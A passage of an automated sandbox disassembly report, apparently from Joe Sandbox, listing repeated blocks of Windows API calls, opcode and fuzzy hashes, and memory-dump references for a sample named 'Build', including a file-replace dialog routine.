                                                                                                    • Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
                                                                                                    • Opcode Fuzzy Hash: d4e5989958f971c78133224c3cb9b8bc583ebbfd78e1a22d76aa3c8f9c5b242b
                                                                                                    • Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 54743ec78eb6fb0cf99217b87d8b0ad20b95361dbc3a44256c807bd66577549a
                                                                                                    • Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
                                                                                                    • Opcode Fuzzy Hash: 54743ec78eb6fb0cf99217b87d8b0ad20b95361dbc3a44256c807bd66577549a
                                                                                                    • Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 6fb3c385f392d7c9189ff324b0f3b35e5ee0ea7d56e1007ab2de0cbb12736cec
                                                                                                    • Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
                                                                                                    • Opcode Fuzzy Hash: 6fb3c385f392d7c9189ff324b0f3b35e5ee0ea7d56e1007ab2de0cbb12736cec
                                                                                                    • Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 92a1cc1e6514b74c149c33b50fcdea593a8c8a880af0c03e138d8660d703d5ff
                                                                                                    • Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
                                                                                                    • Opcode Fuzzy Hash: 92a1cc1e6514b74c149c33b50fcdea593a8c8a880af0c03e138d8660d703d5ff
                                                                                                    • Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 7f0af2d1ef7f6be70c85a90a6c3c0aabc201f958d300c017d273801fbe4bcf4a
                                                                                                    • Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
                                                                                                    • Opcode Fuzzy Hash: 7f0af2d1ef7f6be70c85a90a6c3c0aabc201f958d300c017d273801fbe4bcf4a
                                                                                                    • Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 1601f8a2c1814da6fde69f1261ed8f880d5c2fb3d5efacf3b2dda10564a1e009
                                                                                                    • Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
                                                                                                    • Opcode Fuzzy Hash: 1601f8a2c1814da6fde69f1261ed8f880d5c2fb3d5efacf3b2dda10564a1e009
                                                                                                    • Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 661e48b34b02576ed9b31a8b4bcf12f3697ce64dbcd0949a9dda16e3a4137cbf
                                                                                                    • Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
                                                                                                    • Opcode Fuzzy Hash: 661e48b34b02576ed9b31a8b4bcf12f3697ce64dbcd0949a9dda16e3a4137cbf
                                                                                                    • Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00940A5D
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 61dd7df43e16d91fb1c1f2829b4cd9ae489e2e71c49a7e6c54a95c73318e81bb
                                                                                                    • Instruction ID: 50b5f50ccb7f71f22dfabc7ee3f5ca44512b3b6011ef285f158fe4d1a258dde5
                                                                                                    • Opcode Fuzzy Hash: 61dd7df43e16d91fb1c1f2829b4cd9ae489e2e71c49a7e6c54a95c73318e81bb
                                                                                                    • Instruction Fuzzy Hash: 9EA002D5695201FC3109B1959D2AD36025CD4C0B25730991AF645D50C16465184D5131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009409FC
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 25cbb9716d21c0e533c5acd6232ee19d9be74350d8568820bf8e4fc12e603b63
                                                                                                    • Instruction ID: 0822591939576be1dc5069175906506c858a45ba56dc17c4e03051b81cf4cd8b
                                                                                                    • Opcode Fuzzy Hash: 25cbb9716d21c0e533c5acd6232ee19d9be74350d8568820bf8e4fc12e603b63
                                                                                                    • Instruction Fuzzy Hash: 14A002D5799501FC7505A155AD16D76011CD4C4B657308D29F505C5081547518495231
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00940A5D
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: bd26cd7e1c17fd359378ba94759449a3724b47c490224c296b8e9f30eeb2a546
                                                                                                    • Instruction ID: e23fc0a13b513aa4e42ce07b444408372f4cb22d215a861d6f6c029be8fd5a53
                                                                                                    • Opcode Fuzzy Hash: bd26cd7e1c17fd359378ba94759449a3724b47c490224c296b8e9f30eeb2a546
                                                                                                    • Instruction Fuzzy Hash: E9A002D5699201FC310971959D26D36015CD4C4B657309D1AF545C50C15465184D5131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00940A5D
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 7301770244597e4e581dc2fec9264c57e7b2651984c1ea9ca67fa6dd768478a4
                                                                                                    • Instruction ID: e23fc0a13b513aa4e42ce07b444408372f4cb22d215a861d6f6c029be8fd5a53
                                                                                                    • Opcode Fuzzy Hash: 7301770244597e4e581dc2fec9264c57e7b2651984c1ea9ca67fa6dd768478a4
                                                                                                    • Instruction Fuzzy Hash: E9A002D5699201FC310971959D26D36015CD4C4B657309D1AF545C50C15465184D5131
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNELBASE(?,0092A712,?,?,?,?,?,?,?), ref: 0092B94C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File
                                                                                                    • String ID:
                                                                                                    • API String ID: 749574446-0
                                                                                                    • Opcode ID: 6008ca195f1d5c7ca24db507f7f12f82ee84b193831f1b5c23ecbe1d71133dc0
                                                                                                    • Instruction ID: f78c8754ff5ade8e333b8f23169ad7aef5be6b3bcf0542373a86c030c1aa9877
                                                                                                    • Opcode Fuzzy Hash: 6008ca195f1d5c7ca24db507f7f12f82ee84b193831f1b5c23ecbe1d71133dc0
                                                                                                    • Instruction Fuzzy Hash: CDA011300A800A8A8E002B32CA0800E3B20EB20BC230002A8A00BCB0A2CB22880BAB00
                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 0093CBBA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611563598-0
                                                                                                    • Opcode ID: fcd61643e77f93018fd749449f48dbcb83435080f63bdb214d85387412cfd1a5
                                                                                                    • Instruction ID: 19f81027b5928b2a5a096c4c1a1dfd01ecf63d6486e98c3a0effbc2a0303b372
                                                                                                    • Opcode Fuzzy Hash: fcd61643e77f93018fd749449f48dbcb83435080f63bdb214d85387412cfd1a5
                                                                                                    • Instruction Fuzzy Hash: A6A011302082008B82000B328F0AA0EBAAAAFA2A02F00C028A00280030CB328820BA00
                                                                                                    APIs
                                                                                                      • Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
                                                                                                      • Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0093E602
                                                                                                    • EndDialog.USER32(?,00000006), ref: 0093E615
                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0093E631
                                                                                                    • SetFocus.USER32(00000000), ref: 0093E638
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0093E66C
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0093E69F
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0093E6B5
                                                                                                      • Part of subcall function 0093CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CBEE
                                                                                                      • Part of subcall function 0093CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0093CC05
                                                                                                      • Part of subcall function 0093CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 0093CC19
                                                                                                      • Part of subcall function 0093CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CC2A
                                                                                                      • Part of subcall function 0093CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0093CC42
                                                                                                      • Part of subcall function 0093CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0093CC66
                                                                                                      • Part of subcall function 0093CBC8: _swprintf.LIBCMT ref: 0093CC85
                                                                                                    • _swprintf.LIBCMT ref: 0093E704
                                                                                                      • Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13
                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0093E717
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0093E71E
                                                                                                    • _swprintf.LIBCMT ref: 0093E773
                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0093E786
                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0093E7A0
                                                                                                    • _swprintf.LIBCMT ref: 0093E7D9
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0093E7EC
                                                                                                    • _swprintf.LIBCMT ref: 0093E83C
                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0093E84F
                                                                                                      • Part of subcall function 0093D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0093D0E1
                                                                                                      • Part of subcall function 0093D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,0096272C,?,?), ref: 0093D12A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                                                                    • String ID: %s %s$REPLACEFILEDLG
                                                                                                    • API String ID: 3464475507-439456425
                                                                                                    • Opcode ID: 98f1c5628f14f1f9f98e0b0839edf53fd866e381a57991c02802810e28399f5a
                                                                                                    • Instruction ID: c67c96454f999f0ca1b22e5bc5b5b559b7bb40ea584413701bd7f00e7e38b794
                                                                                                    • Opcode Fuzzy Hash: 98f1c5628f14f1f9f98e0b0839edf53fd866e381a57991c02802810e28399f5a
                                                                                                    • Instruction Fuzzy Hash: 2C71B372649354BBE731ABA4EC4AFFFB7ACEB89700F000819F649D21C1D67599049B62
                                                                                                    APIs
